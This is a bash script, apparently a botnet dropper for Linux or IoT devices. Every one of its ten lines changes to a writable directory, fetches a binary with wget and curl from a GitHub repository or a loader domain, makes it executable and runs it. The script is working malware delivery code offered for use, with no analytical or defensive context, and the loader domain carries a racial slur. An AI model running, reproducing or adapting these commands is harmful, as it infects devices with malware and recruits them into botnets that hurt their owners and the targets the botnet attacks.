#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny9; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny9;cat bunny9 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://niggaloader.com/bins/bunny.mips; curl -O http://niggaloader.com/bins/bunny.mips;cat bunny.mips >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://niggaloader.com/bins/bunny.mpsl; curl -O http://niggaloader.com/bins/bunny.mpsl;cat bunny.mpsl >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny1; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny1;cat bunny1 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny2; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny2;cat bunny2 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny3; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny3;cat bunny3 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny4; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny4;cat bunny4 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/blob/main/bunny5; curl -O http://github.com/hackerman441587489/bunny/blob/main/bunny5;cat bunny5 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny7; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny7;cat bunny7 >robben;chmod +x *;./robben Bunnys
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://github.com/hackerman441587489/bunny/raw/main/bunny8; curl -O http://github.com/hackerman441587489/bunny/raw/main/bunny8;cat bunny8 >robben;chmod +x *;./robben Bunnys
